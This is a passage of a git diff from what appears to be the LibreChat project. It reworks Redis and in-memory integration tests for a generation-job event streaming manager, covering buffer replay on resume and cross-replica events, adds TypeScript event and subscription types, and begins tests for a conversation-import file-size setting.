() => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - // Create job directly in Redis with syncSent: true - const jobStore = new RedisJobStore(ioredisClient); + const jobStore = new RedisJobStore(ioredisClient!); await jobStore.initialize(); const streamId = `cross-sync-${Date.now()}`; @@ -760,9 +771,130 @@ describe('GenerationJobManager Integration Tests', () => { await GenerationJobManager.destroy(); await jobStore.destroy(); }); + + test('should emit created event from metadata on cross-replica subscribe', async () => { + const replicaAJobStore = new RedisJobStore(ioredisClient!); + await replicaAJobStore.initialize(); + + const streamId = `cross-created-${Date.now()}`; + const userId = 'test-user'; + + await replicaAJobStore.createJob(streamId, userId); + await replicaAJobStore.updateJob(streamId, { + userMessage: { + messageId: 'msg-123', + parentMessageId: '00000000-0000-0000-0000-000000000000', + conversationId: streamId, + text: 'hello world', + }, + }); + + jest.resetModules(); + + const services = createStreamServices({ + useRedis: true, + redisClient: ioredisClient, + }); + + GenerationJobManager.configure(services); + GenerationJobManager.initialize(); + + const received: unknown[] = []; + const subscription = await GenerationJobManager.subscribe( + streamId, + (event) => received.push(event), + ); + + expect(subscription).not.toBeNull(); + expect(received.length).toBe(1); + + const created = received[0] as CreatedEvent; + expect(created.created).toBe(true); + expect(created.streamId).toBe(streamId); + expect(created.message.messageId).toBe('msg-123'); + expect(created.message.conversationId).toBe(streamId); + expect(created.message.sender).toBe('User'); + expect(created.message.isCreatedByUser).toBe(true); + + subscription?.unsubscribe(); + await GenerationJobManager.destroy(); + await replicaAJobStore.destroy(); + }); + + test('should NOT emit created event from metadata when userMessage is not set', async () => { + const replicaAJobStore = new RedisJobStore(ioredisClient!); + await replicaAJobStore.initialize(); + + const streamId = `cross-no-created-${Date.now()}`; + await replicaAJobStore.createJob(streamId, 'test-user'); + + jest.resetModules(); + + const services = createStreamServices({ + useRedis: true, + redisClient: ioredisClient, + }); + + GenerationJobManager.configure(services); + GenerationJobManager.initialize(); + + const received: unknown[] = []; + const subscription = await GenerationJobManager.subscribe( + streamId, + (event) => received.push(event), + ); + + expect(subscription).not.toBeNull(); + expect(received.length).toBe(0); + + subscription?.unsubscribe(); + await GenerationJobManager.destroy(); + await replicaAJobStore.destroy(); + }); + + test('should NOT emit created event when skipBufferReplay is true (resume path)', async () => { + const replicaAJobStore = new RedisJobStore(ioredisClient!); + await replicaAJobStore.initialize(); + + const streamId = `cross-no-replay-${Date.now()}`; + await replicaAJobStore.createJob(streamId, 'test-user'); + await replicaAJobStore.updateJob(streamId, { + userMessage: { + messageId: 'msg-456', + conversationId: streamId, + text: 'hi', + }, + }); + + jest.resetModules(); + + const services = createStreamServices({ + useRedis: true, + redisClient: ioredisClient, + }); + + GenerationJobManager.configure(services); + GenerationJobManager.initialize(); + + const received: unknown[] = []; + const subscription = await GenerationJobManager.subscribe( + streamId, + (event) => received.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + + expect(subscription).not.toBeNull(); + expect(received.length).toBe(0); + + subscription?.unsubscribe(); + await GenerationJobManager.destroy(); + await replicaAJobStore.destroy(); + }); }); - describe('Sequential Event Ordering (Redis)', () => { + describeRedis('Sequential Event Ordering (Redis)', () => { /** * These tests verify that events are delivered in strict sequential order * when using Redis mode. This is critical because: @@ -773,11 +905,6 @@ describe('GenerationJobManager Integration Tests', () => { * The fix: emitChunk now awaits Redis publish to ensure ordered delivery. */ test('should maintain strict order for rapid sequential emits', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - jest.resetModules(); const services = createStreamServices({ @@ -823,11 +950,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should maintain order for tool call argument deltas', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - jest.resetModules(); const services = createStreamServices({ @@ -882,11 +1004,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should maintain order: on_run_step before on_run_step_delta', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - jest.resetModules(); const services = createStreamServices({ @@ -945,11 +1062,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should not block other streams when awaiting emitChunk', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - jest.resetModules(); const services = createStreamServices({ @@ -1049,7 +1161,7 @@ describe('GenerationJobManager Integration Tests', () => { created: true, message: { text: 'hello' }, streamId, - } as unknown as ServerSentEvent); + } as CreatedEvent); await manager.emitChunk(streamId, { event: 'on_message_delta', data: { delta: { content: { type: 'text', text: 'First chunk' } } }, @@ -1069,12 +1181,7 @@ describe('GenerationJobManager Integration Tests', () => { await manager.destroy(); }); - test('should buffer and replay events emitted before subscribe (Redis)', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - + testRedis('should buffer and replay events emitted before subscribe (Redis)', async () => { const manager = new GenerationJobManagerClass(); const services = createStreamServices({ useRedis: true, @@ -1091,7 +1198,7 @@ describe('GenerationJobManager Integration Tests', () => { created: true, message: { text: 'hello' }, streamId, - } as unknown as ServerSentEvent); + } as CreatedEvent); await manager.emitChunk(streamId, { event: 'on_message_delta', data: { delta: { content: { type: 'text', text: 'First' } } }, @@ -1118,67 +1225,60 @@ describe('GenerationJobManager Integration Tests', () => { await manager.destroy(); }); - test('should not lose events when emitting before and after subscribe (Redis)', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - - const manager = new GenerationJobManagerClass(); - const services = createStreamServices({ - useRedis: true, - redisClient: ioredisClient, - }); - - manager.configure(services); - manager.initialize(); - - const streamId = `no-loss-${Date.now()}`; - await manager.createJob(streamId, 'user-1'); - - await manager.emitChunk(streamId, { - created: true, - message: { text: 'hello' }, - streamId, - } as unknown as ServerSentEvent); - await manager.emitChunk(streamId, { - event: 'on_run_step', - data: { id: 'step-1', type: 'message_creation', index: 0 }, - }); - - const receivedEvents: unknown[] = []; - const subscription = await manager.subscribe(streamId, (event: unknown) => - receivedEvents.push(event), - ); - - await new Promise((resolve) => setTimeout(resolve, 100)); - - for (let i = 0; i < 10; i++) { - await manager.emitChunk(streamId, { - event: 'on_message_delta', - data: { delta: { content: { type: 'text', text: `word${i} ` } }, index: i }, + testRedis( + 'should not lose events when emitting before and after subscribe (Redis)', + async () => { + const manager = new GenerationJobManagerClass(); + const services = createStreamServices({ + useRedis: true, + redisClient: ioredisClient, }); - } - await new Promise((resolve) => setTimeout(resolve, 300)); + manager.configure(services); + manager.initialize(); - expect(receivedEvents.length).toBe(12); - expect((receivedEvents[0] as Record).created).toBe(true); - expect((receivedEvents[1] as Record).event).toBe('on_run_step'); - for (let i = 0; i < 10; i++) { - expect((receivedEvents[i + 2] as Record).event).toBe('on_message_delta'); - } + const streamId = `no-loss-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); - subscription?.unsubscribe(); - await manager.destroy(); - }); + await manager.emitChunk(streamId, { + created: true, + message: { text: 'hello' }, + streamId, + } as CreatedEvent); + await manager.emitChunk(streamId, { + event: 'on_run_step', + data: { id: 'step-1', type: 'message_creation', index: 0 }, + }); - test('RedisEventTransport.subscribe() should return a ready promise', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } + const receivedEvents: unknown[] = []; + const subscription = await manager.subscribe(streamId, (event: unknown) => + receivedEvents.push(event), + ); + await new Promise((resolve) => setTimeout(resolve, 100)); + + for (let i = 0; i < 10; i++) { + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: `word${i} ` } }, index: i }, + }); + } + + await new Promise((resolve) => setTimeout(resolve, 300)); + + expect(receivedEvents.length).toBe(12); + expect((receivedEvents[0] as Record).created).toBe(true); + expect((receivedEvents[1] as Record).event).toBe('on_run_step'); + for (let i = 0; i < 10; i++) { + expect((receivedEvents[i + 2] as Record).event).toBe('on_message_delta'); + } + + subscription?.unsubscribe(); + await manager.destroy(); + }, + ); + + testRedis('RedisEventTransport.subscribe() should return a ready promise', async () => { const subscriber = (ioredisClient as unknown as { duplicate: () => unknown }).duplicate(); const transport = new RedisEventTransport(ioredisClient as never, subscriber as never); @@ -1211,6 +1311,421 @@ describe('GenerationJobManager Integration Tests', () => { }); }); + describe('Resume: skipBufferReplay prevents duplication', () => { + /** + * Verifies the fix for duplicated content when navigating away from an + * in-progress conversation and back. Events accumulate in earlyEventBuffer + * while the subscriber is absent. On resume, the sync event delivers all + * accumulated content via aggregatedContent, so buffer replay must be + * skipped to prevent duplication. + */ + + test('should NOT replay buffer when skipBufferReplay is true (resume scenario)', async () => { + const manager = createInMemoryManager(); + const streamId = `skip-buf-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + await setupDisconnectedStream(manager, streamId, 10); + + const resumeState = await manager.getResumeState(streamId); + expect(resumeState).not.toBeNull(); + + const resumeEvents: ServerSentEvent[] = []; + const sub2 = await manager.subscribe( + streamId, + (event) => resumeEvents.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + + await new Promise((resolve) => setTimeout(resolve, 20)); + expect(resumeEvents.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: ' Live!' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 20)); + expect(resumeEvents.length).toBe(1); + expect((resumeEvents[0] as StreamEvent).event).toBe('on_message_delta'); + + sub2?.unsubscribe(); + await manager.destroy(); + }); + + test('should replay buffer by default when no options are passed', async () => { + const manager = createInMemoryManager(); + const streamId = `replay-buf-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1Events: ServerSentEvent[] = []; + const sub1 = await manager.subscribe(streamId, (event) => sub1Events.push(event)); + await new Promise((resolve) => setTimeout(resolve, 10)); + + await manager.emitChunk(streamId, { + event: 'on_run_step', + data: { id: 'step-1', runId: 'run-1', index: 0, stepDetails: { type: 'message_creation' } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: 'buffered' } } }, + }); + + const sub2Events: ServerSentEvent[] = []; + const sub2 = await manager.subscribe(streamId, (event) => sub2Events.push(event)); + await new Promise((resolve) => setTimeout(resolve, 20)); + + expect(sub2Events.length).toBe(1); + expect((sub2Events[0] as StreamEvent).event).toBe('on_message_delta'); + + sub2?.unsubscribe(); + await manager.destroy(); + }); + + test('should clear earlyEventBuffer even when skipping replay (no memory leak)', async () => { + const manager = createInMemoryManager(); + const streamId = `buf-clear-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buf1' } } }, + }); + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buf2' } } }, + }); + + const sub2Events: ServerSentEvent[] = []; + const sub2 = await manager.subscribe( + streamId, + (event) => sub2Events.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + await new Promise((resolve) => setTimeout(resolve, 20)); + expect(sub2Events.length).toBe(0); + + sub2?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'new-event' } } }, + }); + + const sub3Events: ServerSentEvent[] = []; + const sub3 = await manager.subscribe(streamId, (event) => sub3Events.push(event)); + await new Promise((resolve) => setTimeout(resolve, 20)); + + expect(sub3Events.length).toBe(1); + const event = sub3Events[0] as { + event: string; + data: { delta: { content: { text: string } } }; + }; + expect(event.data.delta.content.text).toBe('new-event'); + + sub3?.unsubscribe(); + await manager.destroy(); + }); + + test('should handle multiple disconnect/reconnect cycles with skipBufferReplay', async () => { + const manager = createInMemoryManager(); + const streamId = `multi-reconnect-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'initial' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-1' } } }, + }); + + const resumeState1 = await manager.getResumeState(streamId); + expect(resumeState1).not.toBeNull(); + + const sub2Events: ServerSentEvent[] = []; + const sub2 = await manager.subscribe( + streamId, + (event) => sub2Events.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + await new Promise((resolve) => setTimeout(resolve, 10)); + expect(sub2Events.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'live-1' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + expect(sub2Events.length).toBe(1); + + sub2?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-2' } } }, + }); + + const resumeState2 = await manager.getResumeState(streamId); + expect(resumeState2).not.toBeNull(); + + const sub3Events: ServerSentEvent[] = []; + const sub3 = await manager.subscribe( + streamId, + (event) => sub3Events.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + await new Promise((resolve) => setTimeout(resolve, 10)); + expect(sub3Events.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'live-2' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + expect(sub3Events.length).toBe(1); + + sub3?.unsubscribe(); + await manager.destroy(); + }); + + testRedis('should NOT replay buffer when skipBufferReplay is true (Redis)', async () => { + const manager = createRedisManager(); + const streamId = `skip-buf-redis-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + await setupDisconnectedStream(manager, streamId, 100); + + const resumeState = await manager.getResumeState(streamId); + expect(resumeState).not.toBeNull(); + expect(resumeState!.aggregatedContent?.length).toBeGreaterThan(0); + + const resumeEvents: ServerSentEvent[] = []; + const sub2 = await manager.subscribe( + streamId, + (event) => resumeEvents.push(event), + undefined, + undefined, + { skipBufferReplay: true }, + ); + + await new Promise((resolve) => setTimeout(resolve, 200)); + expect(resumeEvents.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: ' Live!' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 200)); + expect(resumeEvents.length).toBe(1); + expect((resumeEvents[0] as StreamEvent).event).toBe('on_message_delta'); + + sub2?.unsubscribe(); + await manager.destroy(); + }); + + testRedis( + 'should replay buffer without skipBufferReplay after disconnect (Redis)', + async () => { + const manager = createRedisManager(); + const streamId = `replay-buf-redis-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 100)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 100)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-redis' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 100)); + + const sub2Events: ServerSentEvent[] = []; + const sub2 = await manager.subscribe(streamId, (event) => sub2Events.push(event)); + + await new Promise((resolve) => setTimeout(resolve, 200)); + + expect(sub2Events.length).toBe(1); + expect((sub2Events[0] as StreamEvent).event).toBe('on_message_delta'); + + sub2?.unsubscribe(); + await manager.destroy(); + }, + ); + }); + + describe('Atomic subscribeWithResume', () => { + test('should return empty pendingEvents for pre-snapshot buffer events (in-memory)', async () => { + const manager = createInMemoryManager(); + const streamId = `atomic-drain-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_run_step', + data: { id: 'step-1', runId: 'run-1', index: 0, stepDetails: { type: 'message_creation' } }, + }); + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { id: 'step-1', delta: { content: { type: 'text', text: 'buffered' } } }, + }); + + const liveEvents: ServerSentEvent[] = []; + const { subscription, resumeState, pendingEvents } = await manager.subscribeWithResume( + streamId, + (event) => liveEvents.push(event), + ); + + expect(resumeState).not.toBeNull(); + expect(pendingEvents.length).toBe(0); + expect(liveEvents.length).toBe(0); + + subscription?.unsubscribe(); + await manager.destroy(); + }); + + test('should return empty pendingEvents when buffer is empty', async () => { + const manager = createInMemoryManager(); + const streamId = `atomic-empty-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'delivered' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 10)); + + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + const { pendingEvents } = await manager.subscribeWithResume(streamId, () => {}); + + expect(pendingEvents.length).toBe(0); + + await manager.destroy(); + }); + + test('should deliver live events after subscribeWithResume', async () => { + const manager = createInMemoryManager(); + const streamId = `atomic-live-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 10)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 20)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-pre-snapshot' } } }, + }); + + const liveEvents: ServerSentEvent[] = []; + const { subscription, pendingEvents } = await manager.subscribeWithResume(streamId, (event) => + liveEvents.push(event), + ); + + expect(pendingEvents.length).toBe(0); + expect(liveEvents.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'live-after' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 20)); + expect(liveEvents.length).toBe(1); + const liveEvent = liveEvents[0] as { + event: string; + data: { delta: { content: { text: string } } }; + }; + expect(liveEvent.data.delta.content.text).toBe('live-after'); + + subscription?.unsubscribe(); + await manager.destroy(); + }); + + testRedis( + 'should return empty pendingEvents in Redis mode (chunks already persisted)', + async () => { + const manager = createRedisManager(); + const streamId = `atomic-redis-${Date.now()}`; + await manager.createJob(streamId, 'user-1'); + + const sub1 = await manager.subscribe(streamId, () => {}); + await new Promise((resolve) => setTimeout(resolve, 100)); + sub1?.unsubscribe(); + await new Promise((resolve) => setTimeout(resolve, 100)); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'buffered-redis' } } }, + }); + await new Promise((resolve) => setTimeout(resolve, 100)); + + const liveEvents: ServerSentEvent[] = []; + const { subscription, resumeState, pendingEvents } = await manager.subscribeWithResume( + streamId, + (event) => liveEvents.push(event), + ); + + expect(resumeState).not.toBeNull(); + expect(pendingEvents.length).toBe(0); + + await manager.emitChunk(streamId, { + event: 'on_message_delta', + data: { delta: { content: { type: 'text', text: 'live-redis' } } }, + }); + + await new Promise((resolve) => setTimeout(resolve, 200)); + expect(liveEvents.length).toBe(1); + + subscription?.unsubscribe(); + await manager.destroy(); + }, + ); + }); + describe('Error Preservation for Late Subscribers', () => { /** * These tests verify the fix for the race condition where errors @@ -1369,14 +1884,9 @@ describe('GenerationJobManager Integration Tests', () => { await GenerationJobManager.destroy(); }); - test('should handle error preservation in Redis mode (cross-replica)', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - + testRedis('should handle error preservation in Redis mode (cross-replica)', async () => { // === Replica A: Creates job and emits error === - const replicaAJobStore = new RedisJobStore(ioredisClient); + const replicaAJobStore = new RedisJobStore(ioredisClient!); await replicaAJobStore.initialize(); const streamId = `redis-error-${Date.now()}`; @@ -1463,13 +1973,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Cross-Replica Live Streaming (Redis)', () => { + describeRedis('Cross-Replica Live Streaming (Redis)', () => { test('should publish events to Redis even when no local subscriber exists', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const replicaA = new GenerationJobManagerClass(); const servicesA = createStreamServices({ useRedis: true, @@ -1489,7 +1994,7 @@ describe('GenerationJobManager Integration Tests', () => { const streamId = `cross-live-${Date.now()}`; await replicaA.createJob(streamId, 'user-1'); - const replicaBJobStore = new RedisJobStore(ioredisClient); + const replicaBJobStore = new RedisJobStore(ioredisClient!); await replicaBJobStore.initialize(); await replicaBJobStore.createJob(streamId, 'user-1'); @@ -1519,11 +2024,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should not cause data loss on cross-replica subscribers when local subscriber joins', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const replicaA = new GenerationJobManagerClass(); const servicesA = createStreamServices({ useRedis: true, @@ -1543,7 +2043,7 @@ describe('GenerationJobManager Integration Tests', () => { const streamId = `cross-seq-safe-${Date.now()}`; await replicaA.createJob(streamId, 'user-1'); - const replicaBJobStore = new RedisJobStore(ioredisClient); + const replicaBJobStore = new RedisJobStore(ioredisClient!); await replicaBJobStore.initialize(); await replicaBJobStore.createJob(streamId, 'user-1'); @@ -1603,11 +2103,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should deliver buffered events locally AND publish live events cross-replica', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const replicaA = new GenerationJobManagerClass(); const servicesA = createStreamServices({ useRedis: true, @@ -1623,7 +2118,7 @@ describe('GenerationJobManager Integration Tests', () => { created: true, message: { text: 'hello' }, streamId, - } as unknown as ServerSentEvent); + } as CreatedEvent); const receivedOnA: unknown[] = []; const subA = await replicaA.subscribe(streamId, (event: unknown) => receivedOnA.push(event)); @@ -1641,7 +2136,7 @@ describe('GenerationJobManager Integration Tests', () => { replicaB.configure(servicesB); replicaB.initialize(); - const replicaBJobStore = new RedisJobStore(ioredisClient); + const replicaBJobStore = new RedisJobStore(ioredisClient!); await replicaBJobStore.initialize(); await replicaBJobStore.createJob(streamId, 'user-1'); @@ -1661,7 +2156,8 @@ describe('GenerationJobManager Integration Tests', () => { await new Promise((resolve) => setTimeout(resolve, 700)); expect(receivedOnA.length).toBe(4); - expect(receivedOnB.length).toBe(3); + expect(receivedOnB.length).toBe(4); + expect((receivedOnB[0] as CreatedEvent).created).toBe(true); subA?.unsubscribe(); subB?.unsubscribe(); @@ -1671,13 +2167,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Concurrent Subscriber Readiness (Redis)', () => { + describeRedis('Concurrent Subscriber Readiness (Redis)', () => { test('should return ready promise to all concurrent subscribers for same stream', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const subscriber = ( ioredisClient as unknown as { duplicate: () => typeof ioredisClient } ).duplicate()!; @@ -1706,13 +2197,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Sequence Reset Safety (Redis)', () => { + describeRedis('Sequence Reset Safety (Redis)', () => { test('should not receive stale pre-subscribe events via Redis after sequence reset', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const manager = new GenerationJobManagerClass(); const services = createStreamServices({ useRedis: true, @@ -1774,11 +2260,6 @@ describe('GenerationJobManager Integration Tests', () => { }); test('should not reset sequence when second subscriber joins mid-stream', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const manager = new GenerationJobManagerClass(); const services = createStreamServices({ useRedis: true, @@ -1837,13 +2318,8 @@ describe('GenerationJobManager Integration Tests', () => { }); }); - describe('Subscribe Error Recovery (Redis)', () => { + describeRedis('Subscribe Error Recovery (Redis)', () => { test('should allow resubscription after Redis subscribe failure', async () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - const subscriber = ( ioredisClient as unknown as { duplicate: () => typeof ioredisClient } ).duplicate()!; @@ -1892,12 +2368,7 @@ describe('GenerationJobManager Integration Tests', () => { }); describe('createStreamServices Auto-Detection', () => { - test('should use Redis when useRedis is true and client is available', () => { - if (!ioredisClient) { - console.warn('Redis not available, skipping test'); - return; - } - + testRedis('should use Redis when useRedis is true and client is available', () => { const services = createStreamServices({ useRedis: true, redisClient: ioredisClient, diff --git a/packages/api/src/types/events.ts b/packages/api/src/types/events.ts index 1e866fa840..d068888b17 100644 --- a/packages/api/src/types/events.ts +++ b/packages/api/src/types/events.ts @@ -1,4 +1,49 @@ -export type ServerSentEvent = { +/** SSE streaming event (on_run_step, on_message_delta, etc.) */ +export type StreamEvent = { + event: string; data: string | Record; - event?: string; }; + +/** Control event emitted when user message is created and generation starts */ +export type CreatedEvent = { + created: true; + message: { + messageId: string; + parentMessageId?: string; + conversationId?: string; + text?: string; + sender: string; + isCreatedByUser: boolean; + }; + streamId: string; +}; + +export type FinalMessageFields = { + messageId?: string; + parentMessageId?: string; + conversationId?: string; + text?: string; + content?: unknown[]; + sender?: string; + isCreatedByUser?: boolean; + unfinished?: boolean; + /** Per-message error flag — matches TMessage.error (boolean or error text) */ + error?: boolean | string; + [key: string]: unknown; +}; + +/** Terminal event emitted when generation completes or is aborted */ +export type FinalEvent = { + final: true; + requestMessage?: FinalMessageFields | null; + responseMessage?: FinalMessageFields | null; + conversation?: { conversationId?: string; [key: string]: unknown } | null; + title?: string; + aborted?: boolean; + earlyAbort?: boolean; + runMessages?: FinalMessageFields[]; + /** Top-level event error (abort-during-completion edge case) */ + error?: { message: string }; +}; + +export type ServerSentEvent = StreamEvent | CreatedEvent | FinalEvent; diff --git a/packages/api/src/types/stream.ts b/packages/api/src/types/stream.ts index 79b29d774f..068d9c8db8 100644 --- a/packages/api/src/types/stream.ts +++ b/packages/api/src/types/stream.ts @@ -47,3 +47,24 @@ export type ChunkHandler = (event: ServerSentEvent) => void; export type DoneHandler = (event: ServerSentEvent) => void; export type ErrorHandler = (error: string) => void; export type UnsubscribeFn = () => void; + +/** Options for subscribing to a job event stream */ +export interface SubscribeOptions { + /** + * When true, skips replaying the earlyEventBuffer. + * Use for resume connections after a sync event has been sent. + */ + skipBufferReplay?: boolean; +} + +/** Result of an atomic subscribe-with-resume operation */ +export interface SubscribeWithResumeResult { + subscription: { unsubscribe: UnsubscribeFn } | null; + resumeState: ResumeState | null; + /** + * Events that arrived between the resume snapshot and the subscribe call. + * In-memory mode: drained from earlyEventBuffer (only place they exist). + * Redis mode: empty — chunks are persisted to the store and appear in aggregatedContent on next resume. + */ + pendingEvents: ServerSentEvent[]; +} diff --git a/packages/api/src/utils/__tests__/import.test.ts b/packages/api/src/utils/__tests__/import.test.ts new file mode 100644 index 0000000000..08fa94669d --- /dev/null +++ b/packages/api/src/utils/__tests__/import.test.ts @@ -0,0 +1,76 @@ +jest.mock('@librechat/data-schemas', () => ({ + logger: { info: jest.fn(), warn: jest.fn(), error: jest.fn(), debug: jest.fn() }, +})); + +import { DEFAULT_IMPORT_MAX_FILE_SIZE, resolveImportMaxFileSize } from '../import'; +import { logger } from '@librechat/data-schemas'; + +describe('resolveImportMaxFileSize', () => { + let originalEnv: string | undefined; + + beforeEach(() => { + originalEnv = process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES; + jest.clearAllMocks(); + }); + + afterEach(() => { + if (originalEnv !== undefined) { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = originalEnv; + } else { + delete process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES; + } + }); + + it('returns 262144000 (250 MiB) when env var is not set', () => { + delete process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES; + expect(resolveImportMaxFileSize()).toBe(262144000); + expect(DEFAULT_IMPORT_MAX_FILE_SIZE).toBe(262144000); + }); + + it('returns default when env var is empty string', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = ''; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + }); + + it('respects a custom numeric value', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '5242880'; + expect(resolveImportMaxFileSize()).toBe(5242880); + }); + + it('parses string env var to number', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '1048576'; + expect(resolveImportMaxFileSize()).toBe(1048576); + }); + + it('falls back to default and warns for non-numeric string', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = 'abc'; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + expect(logger.warn).toHaveBeenCalledWith( + expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'), + ); + }); + + it('falls back to default and warns for negative values', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '-100'; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + expect(logger.warn).toHaveBeenCalledWith( + expect.stringContaining('Invalid CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES'), + ); + }); + + it('falls back to default and warns for zero', () => { + process.env.CONVERSATION_IMPORT_MAX_FILE_SIZE_BYTES = '0'; + expect(resolveImportMaxFileSize()).toBe(DEFAULT_IMPORT_MAX_FILE_SIZE); + expect(logger.warn).toHaveBeenCalledWith( + 